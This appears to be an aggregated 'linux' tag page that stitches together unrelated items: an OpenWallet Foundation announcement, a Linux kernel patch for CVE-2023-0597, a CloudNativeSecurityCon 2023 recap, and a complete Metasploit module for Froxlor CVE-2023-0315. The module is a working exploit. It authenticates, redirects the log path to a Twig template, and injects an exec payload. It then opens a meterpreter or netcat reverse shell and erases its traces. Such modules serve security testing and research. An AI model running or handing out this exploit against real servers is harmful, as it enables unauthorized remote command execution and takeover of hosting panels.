*   Hundreds of digital wallets exist, but suffer from a host of problems, including vendor lock in, no interoperability, questionable security, and limited capabilities.
*   New wallets are underway, too, but without them all staying in sync, every country or organization that issues credentials could become a walled garden. IDs and wallets from elsewhere won’t work, disrupting travel, international students, and mobile workforces. 
*   The future will include multiple wallets, which is why we need a world-class wallet engine to ensure that interoperability is built in.

Quotes from inaugural members are available here.

For more information about the project and how to participate in this work, please visit: openwallet.foundation.

Join Open Wallet Foundation members for a livestream and Q&A on February 23rd, at 5:00 pm CEST/11:00 am ET. Register here.

**About Linux Foundation Europe**

Linux Foundation Europe was launched in September 2022 to facilitate open collaborations originating in Europe that succeed on a global scale, supporting one of the largest and most influential open source ecosystems in the world. The Linux Foundation and Linux Foundation Europe together are supported by more than 3000 members internationally. The Linux Foundation is the world's leading home for collaboration on open source software, hardware, standards, and data. Linux Foundation projects are critical to the world's infrastructure including Linux, Kubernetes, Node.js, ONAP, Hyperledger Foundation, PyTorch, RISC-V, and more. Linux Foundation Europe methodology focuses on leveraging best practices and addressing the needs of contributors, users, and solution providers to create sustainable models for open collaboration. For more information, please visit linuxfoundation.eu.

Linux Foundation Europe Announces Formation of OpenWallet Foundation

A flaw possibility of memory leak in the Linux kernel cpu_entry_area mapping of X86 CPU data to memory was found in the way user can guess location of exception stack(s) or other important data. A local user could use this flaw to get access to some important data with expected location in memory.

Seth found that the CPU-entry-area; the piece of per-cpu data that is mapped into the userspace page-tables for kPTI is not subject to any randomization -- irrespective of kASLR settings. On x86\_64 a whole P4D (512 GB) of virtual address space is reserved for this structure, which is plenty large enough to randomize things a little. As such, use a straight forward randomization scheme that avoids duplicates to spread the existing CPUs over the available space. \[ bp: Fix le build. \] Reported-by: Seth Jenkins <sethjenkins@google.com> Reviewed-by: Kees Cook <keescook@chromium.org> Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org> Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com> Signed-off-by: Borislav Petkov <bp@suse.de>

@@ -130,10 +130,6 @@ struct cpu\_entry\_area {

};

#define CPU\_ENTRY\_AREA\_SIZE (sizeof(struct cpu\_entry\_area))

\-#define CPU\_ENTRY\_AREA\_ARRAY\_SIZE (CPU\_ENTRY\_AREA\_SIZE \* NR\_CPUS)

\-

\-/\* Total size includes the readonly IDT mapping page as well: \*/

\-#define CPU\_ENTRY\_AREA\_TOTAL\_SIZE (CPU\_ENTRY\_AREA\_ARRAY\_SIZE + PAGE\_SIZE)

DECLARE\_PER\_CPU(struct cpu\_entry\_area \*, cpu\_entry\_area);

DECLARE\_PER\_CPU(struct cea\_exception\_stacks \*, cea\_exception\_stacks);

@@ -11,6 +11,12 @@

#define CPU\_ENTRY\_AREA\_RO\_IDT\_VADDR ((void \*)CPU\_ENTRY\_AREA\_RO\_IDT)

\-#define CPU\_ENTRY\_AREA\_MAP\_SIZE (CPU\_ENTRY\_AREA\_PER\_CPU + CPU\_ENTRY\_AREA\_ARRAY\_SIZE - CPU\_ENTRY\_AREA\_BASE)

+#ifdef CONFIG\_X86\_32

+#define CPU\_ENTRY\_AREA\_MAP\_SIZE (CPU\_ENTRY\_AREA\_PER\_CPU + \\

\+ (CPU\_ENTRY\_AREA\_SIZE \* NR\_CPUS) - \\

\+ CPU\_ENTRY\_AREA\_BASE)

+#else

+#define CPU\_ENTRY\_AREA\_MAP\_SIZE P4D\_SIZE

+#endif

#endif /\* \_ASM\_X86\_PGTABLE\_AREAS\_H \*/

@@ -266,7 +266,7 @@ static inline bool within\_cpu\_entry(unsigned long addr, unsigned long end)

/\* CPU entry erea is always used for CPU entry \*/

if (within\_area(addr, end, CPU\_ENTRY\_AREA\_BASE,

\- CPU\_ENTRY\_AREA\_TOTAL\_SIZE))

\+ CPU\_ENTRY\_AREA\_MAP\_SIZE))

return true;

/\*

@@ -16,16 +16,53 @@ static DEFINE\_PER\_CPU\_PAGE\_ALIGNED(struct entry\_stack\_page, entry\_stack\_storage)

#ifdef CONFIG\_X86\_64

static DEFINE\_PER\_CPU\_PAGE\_ALIGNED(struct exception\_stacks, exception\_stacks);

DEFINE\_PER\_CPU(struct cea\_exception\_stacks\*, cea\_exception\_stacks);

\-#endif

\-#ifdef CONFIG\_X86\_32

+static DEFINE\_PER\_CPU\_READ\_MOSTLY(unsigned long, \_cea\_offset);

+

+static \_\_always\_inline unsigned int cea\_offset(unsigned int cpu)

+{

\+ return per\_cpu(\_cea\_offset, cpu);

+}

+

+static \_\_init void init\_cea\_offsets(void)

+{

\+ unsigned int max\_cea;

\+ unsigned int i, j;

+

\+ max\_cea = (CPU\_ENTRY\_AREA\_MAP\_SIZE - PAGE\_SIZE) / CPU\_ENTRY\_AREA\_SIZE;

+

\+ /\* O(sodding terrible) \*/

\+ for\_each\_possible\_cpu(i) {

\+ unsigned int cea;

+

+again:

\+ cea = prandom\_u32\_max(max\_cea);

+

\+ for\_each\_possible\_cpu(j) {

\+ if (cea\_offset(j) == cea)

\+ goto again;

+

\+ if (i == j)

\+ break;

\+ }

+

\+ per\_cpu(\_cea\_offset, i) = cea;

\+ }

+}

+#else /\* !X86\_64 \*/

DECLARE\_PER\_CPU\_PAGE\_ALIGNED(struct doublefault\_stack, doublefault\_stack);

+

+static \_\_always\_inline unsigned int cea\_offset(unsigned int cpu)

+{

\+ return cpu;

+}

+static inline void init\_cea\_offsets(void) { }

#endif

/\* Is called from entry code, so must be noinstr \*/

noinstr struct cpu\_entry\_area \*get\_cpu\_entry\_area(int cpu)

{

\- unsigned long va = CPU\_ENTRY\_AREA\_PER\_CPU + cpu \* CPU\_ENTRY\_AREA\_SIZE;

\+ unsigned long va = CPU\_ENTRY\_AREA\_PER\_CPU + cea\_offset(cpu) \* CPU\_ENTRY\_AREA\_SIZE;

BUILD\_BUG\_ON(sizeof(struct cpu\_entry\_area) % PAGE\_SIZE != 0);

return (struct cpu\_entry\_area \*) va;

@@ -211,7 +248,6 @@ static \_\_init void setup\_cpu\_entry\_area\_ptes(void)

/\* The +1 is for the readonly IDT: \*/

BUILD\_BUG\_ON((CPU\_ENTRY\_AREA\_PAGES+1)\*PAGE\_SIZE != CPU\_ENTRY\_AREA\_MAP\_SIZE);

\- BUILD\_BUG\_ON(CPU\_ENTRY\_AREA\_TOTAL\_SIZE != CPU\_ENTRY\_AREA\_MAP\_SIZE);

BUG\_ON(CPU\_ENTRY\_AREA\_BASE & ~PMD\_MASK);

start = CPU\_ENTRY\_AREA\_BASE;

@@ -227,6 +263,8 @@ void \_\_init setup\_cpu\_entry\_areas(void)

{

unsigned int cpu;

\+ init\_cea\_offsets();

+

setup\_cpu\_entry\_area\_ptes();

for\_each\_possible\_cpu(cpu)

CVE-2023-0597: git/torvalds/linux.git - Linux kernel source tree

CloudNativeSecurityCon North America 2023 was a vendor-neutral cloud-native security conference. Here's why it was important.

Cloud-native technology is growing in importance, and the Cloud Native Computing Foundation (CNCF), part of the Linux Foundation, is a key organization driving collaboration on cloud security throughout the industry.

That collaboration includes events such as KubeCon Americas and Europe, which often feature cloud-native security as a key topic, but seeing the importance of cloud native security, CNCF took the next step and created a separate event.

CloudNativeSecurityCon North America 2023 (CNSC) recently took place in Seattle, and served as the first vendor-neutral, practitioner-driven conference focused exclusively on cloud-native security. The event featured over 800 attendees and 50 sponsors. It had 70-plus sessions for all security levels of technologists.

**Security Is People-Powered; Industry Collaboration Is a Solution**

Security remains a pressing issue for the cloud-native and open source community, said Priyanka Sharma, Executive Director, CNCF. During her keynote, she said there are 7.1 million-plus cloud-native developers according to Slash Data.

She emphasized that the industry needs "a paradigm shift to level up our performance," as cloud usage will continue to grow, and so will the threats related to it.

Though the organizations are doing their part to secure their cloud environments, Sharma indicated that top-down approach may not be the best way, instead having a more bottom-up approach from the community, pointing to software security vendor Snyk's "2022 State of Cloud Security Report," which showed 77% of organizations saw poor training and collaboration as a major cloud security challenge.

    

Source: CNSC

Having siloed teams working in different countries, using different tools, and counting on unmonitored policies are common security challenges in many enterprise security scenarios, but when they involve the cloud, it multiplies difficulties to the security environment further. Hence, Sharma stated, "Security is people-powered," and having industry-level collaboration from all the stakeholders along with a shared asset directory will improve cloud security across the industry. Even after all the talks about innovation and right approach done in the cloud-native space, a skill shortage is something the industry is still facing. CNCF announced Kubernetes and Cloud Associate (KCSA) certification, to address the biggest challenge of lack of technical expertise in cloud-native environment.

CNCF organizes itself with Technical Advisory Groups (TAGs) for different focus areas, and it is looking to a Security TAG to help organizations with facilitating the security for projects across the cloud-native ecosystem. It's a 165-member team that supports CNCF projects through education, partnership, and project engagement. This group will help with security features for any CNCF projects; any incubating project within the organization must now go through a security audit by the Security TAG. The Sigstore project that was adopted by Kubernetes was an example of such open, multivendor collaboration.

**Key Conference Topics**

Themes that popped up during the event — including SBOM, runtime security, infrastructure as-a-code security, code to secure policies and authentication, and ChatGPT — indicated that the adoption of cloud-native applications will continue to grow, and the industry must prioritize security for these applications. The thought of having an open source security tool for securing open source code makes sense. Today, CNCF has 21 security-related open-source projects: Open Policy Agent (OPA) and Update Framework TUF have graduated with five other incubating projects, and the rest are in the sandbox stage.

**Software Supply Chain Security**

    

Source: CNSC

Many sessions at the conference were focused on understanding what the software supply chain means and why securing it remains important.

A talk by a Yahoo representative highlighted how 85% to 97% of enterprise code uses open source components, and any vulnerabilities in these may pose security threats. That issue underscores the importance of having security ingrained at every stage of the software development life cycle (SDLC), from application development to CI/CD pipeline down to production.

Code dependencies have become one of the most common reasons leading to supply chain attacks. According to a recent report on software supply chain security, supply chain attacks have grown 742% year-over-year in the past three years. Therefore, a DevSecOps approach is important to ensure the DevOps workflow is maintained by making security seamless. It means having security as an intrinsic part of application development, integration, and operation in DevOps-centric environments.

**"Shift Right" Is as Important as "Shift Left"**

Deployment of applications in the cloud has been a fast-track initiative for many enterprises, often in support of digital transformation initiatives, but many of the same security challenges, such as software vulnerabilities, managing configuration and permission, compliance, and detecting and responding to threats, plaguing traditional applications also hamper cloud application security.

From the cloud-native point of view, two trends are most visible. The first is the way in which "shift left" corresponds to the usage of CI/CD security, having centralized responsibilities and dependencies that can be monitored. It points to moving security toward an earlier stage in the software development life cycle, namely that security is built in from the time the source code is created.

But the second trend is "shift right," which is gaining equal importance in understanding what is going on in the runtime environment as the workload deployed on microservices and orchestrated by Kubernetes. The Falco project with CNCF (originally started by Sysdig), which is based on eBPF technology, seeks to help organizations understand what every process is doing in its containers and hosts. It is like a security camera for the cloud environment.

**Software Bill of Materials**

Log4j was a top of mind during the show, highlighting how it disrupted the operations of many organizations in so many different ways.

Similar high-profile attacks on the supply chain were the reason for the US federal government to issue an executive order to create guidelines for securing software solutions used for the government. The change of approach to building software using third-party dependencies makes having full transparency in the application important.

So, the approach of maintaining a software bill of materials (SBOM) that will offer a listing all components, modules, and libraries used in the application and also drawing the relationship between supply chain components is becoming increasingly important.

One interesting exchange during the conference tackled how to handle metadata that will be collected over time by each software element. In a panel, a Google representative mentioned its new product, Graph for Understanding Artifact Composition (GUAC), which functions like an aggregator for this metadata in a high-fidelity graph database.

**Sponsor Landscape**

    

Source: Omdia

CNSC was a relatively small-scale conference, but its sponsors represented vendors distributed across the industry. Approximately 55% were security vendors, 18% technology vendors offering some security, 12% were technology vendors that use in-house security product but do not sell the security product as a stand-alone offering, and 15% non-security vendors.

**A Strong Start**

The first-ever CNSC was a strong start for the cloud-native community to create a place to gather each year for a focused look at security challenges and opportunities in cloud-native environments.

CNCF is doing a great job getting different types of vendors together and supporting cloud-native security projects. This is exposing developers to security concerns. On the contrary, traditional security teams also must learn to work better with developers and ensure security approaches align with development priorities and business objectives.

This is just a first step toward solving the problems related to cloud-native security. There is more collaboration with people and process to be done in future.

Top Takeaways From CloudNativeSecurityCon 2023

Froxlor versions 2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path to any directory on the OS level which the user www-data can write without restrictions from the backend which leads to writing a malicious Twig template that the application will render. That leads to remote command execution under the user www-data.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Froxlor Log Path RCE',        'Description' => %q{          Froxlor v2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path          to any directory on the OS level which the user www-data can write without restrictions from the backend which          leads to writing a malicious Twig template that the application will render. That will lead to achieving a          remote command execution under the user www-data.        },        'Author' => [          'Askar', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'URL', 'https://shells.systems/author/askar/'],          [ 'CVE', '2023-0315']        ],        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Linux ',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => ['wget'],              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        },        'DisclosureDate' => '2023-01-29'      )    )    register_options(      [        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'admin']),        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', '']),        OptString.new('TARGETURI', [true, 'The base path to the vulnerable Froxlor instance', '/froxlor']),        OptString.new('WEB_ROOT', [true, 'The webroot ', '/var/www/html'])      ]    )  end  def login    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'keep_cookies' => true,      'vars_post' => {        'loginname' => datastore['USERNAME'],        'password' => datastore['PASSWORD'],        'send' => 'send',        'dologin' => ''      }    )    if res && (res.code == 302 && res.headers.include?('Location') && res.headers['Location'] == 'admin_index.php')      send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, '/admin_index.php'),        'keep_cookies' => true      )      print_good('Successful login')      true    else      false    end  end  def check    begin      @authenticated = login    rescue InvalidRequest, InvalidResponse => e      return Exploit::CheckCode::Unknown("Failed to authenticate to Froxlor: #{e.class}, #{e}")    end    version_url = '/lib/ajax.php?action=updatecheck&theme=Froxlor'    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, version_url),      'keep_cookies' => true    )    if res.nil? || res.code != 200      Exploit::CheckCode::Unknown("Failed to retrieve version info from #{normalize_uri(target_uri.path, version_url)}")    else      version = res.get_html_document.at('body/span/text()')      if version        if Rex::Version.new('2.0.6') >= Rex::Version.new(version)          Exploit::CheckCode::Appears("Vulnerable version found: #{version}")        end      else        Exploit::CheckCode::Detected("Failed to obtain Froxlor version info from #{normalize_uri(target_uri.path, version_url)}")      end    end  end  def get_csrf_token(url)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, url),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}") unless (!res.nil? || res.code == 200)    csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text    fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.") unless csrf_token    print_good("CSRF token is : #{csrf_token}")    csrf_token  end  def change_log_path(new_logfile)    mime = Rex::MIME::Message.new    mime.add_part('0', nil, nil, 'form-data; name="logger_enabled"')    mime.add_part('1', nil, nil, 'form-data; name="logger_enabled"')    mime.add_part('2', nil, nil, 'form-data; name="logger_severity"')    mime.add_part('file', nil, nil, 'form-data; name="logger_logtypes[]"')    mime.add_part(new_logfile, nil, nil, 'form-data; name="logger_logfile"')    mime.add_part('0', nil, nil, 'form-data; name="logger_log_cron"')    mime.add_part(@csrf_token, nil, nil, 'form-data; name="csrf_token"')    mime.add_part('overview', nil, nil, 'form-data; name="page"')    mime.add_part('', nil, nil, 'form-data; name="action"')    mime.add_part('send', nil, nil, 'form-data; name="send"')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/admin_settings.php?'),      'vars_get' => { 'page' => 'overview', 'part' => 'logging' },      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{mime.bound}",      'data' => mime.to_s    )    if res && res.code == 200 && res.body.include?('The settings have been successfully saved')      return true    end    false  end  def execute_command(cmd, _opts = {})    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),      'keep_cookies' => true,      'vars_post' => {        'theme' => "{{['#{cmd}']|filter('exec')}}",        'csrf_token' => @csrf_token,        'page' => 'change_theme',        'send' => 'send',        'dosave' => ''      }    )    if res && res.code == 302 && res.headers['Location']      if res.headers['Location'] == 'admin_index.php'        print_good('Injected payload successfully')        print_status("Changing log path back to default value while triggering payload: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")        change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")      end    else      print_error('did not inject payload successfully')    end  end  def exploit    fail_with(Failure::NoAccess, 'Failed to login') unless @authenticated || login    @csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')    if change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")      print_good("Changed logfile path to: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")      case target['Type']      when :unix_memory        execute_command(payload.encoded)      when :linux_dropper        execute_cmdstager      else        print_error('Please enter valid target')      end    else      fail_with(Failure::UnexpectedReply, 'Failed to change the log path. The target might not be exploitable')    end  end  def on_new_session(session)    super    # Original footer.html.twig file    footer_html_twig = <<~EOF      <footer class="text-center mb-3">              <span>                      <img src="{{ basehref|default("") }}templates/Froxlor/assets/img/logo_grey.png" alt="Froxlor"/>                      {% if install_mode is not defined  %}                              {% if (get_setting('admin.show_version_login') == '1'                                      and area == 'login') or (area != 'login'                                      and get_setting('admin.show_version_footer') == '1') %}                                      {{ call_static('\\Froxlor\\Froxlor', 'getFullVersion') }}                              {% endif %}                      {% endif %}                      &copy; 2009-{{ "now"|date("Y") }} by <a href="https://www.froxlor.org/" rel="external" target="_blank">the Froxlor Team</a><br>                      {% if install_mode is not defined %}                              {% if (get_setting('panel.imprint_url') != '') %}<a href="{{ get_setting('panel.imprint_url') }}" target="_blank" class="footer-link">{{ lng('imprint') }}</a>{% endif %}                              {% if (get_setting('panel.terms_url') != '') %}<a href="{{ get_setting('panel.terms_url') }}" target="_blank" class="footer-link">{{ lng('terms') }}</a>{% endif %}                              {% if (get_setting('panel.privacy_url') != '') %}<a href="{{ get_setting('panel.privacy_url') }}" target="_blank" class="footer-link">{{ lng('privacy') }}</a>{% endif %}                      {% endif %}              </span>          {% if lng('translator') %}                      <br/>              <small class="mt-3">{{ lng('panel.translator') }}: {{ lng('translator') }}</small>          {% endif %}      </footer>    EOF    if session.type == 'meterpreter'      print_status('Deleting tampered footer.html.twig file')      filename = "#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig"      session.fs.file.rm(filename)      fd = session.fs.file.new(filename, 'wb')      print_status('Rewriting clean footer.html.twig file')      fd.write(footer_html_twig)      fd.close    else      print_status('Cleaning tampered footer.html.twig file')      # Remove all log lines added to footer.html.twig by the exploit      # (all log lines start with an opening square bracket ex: [2023-02-16 09:08:28] froxlor.INFO: [API] ...)      session.shell_command_token("sed '/^\\[/d' #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig > #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp")      session.shell_command_token("mv -f #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")      session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp")    end  endend

Tag

#linux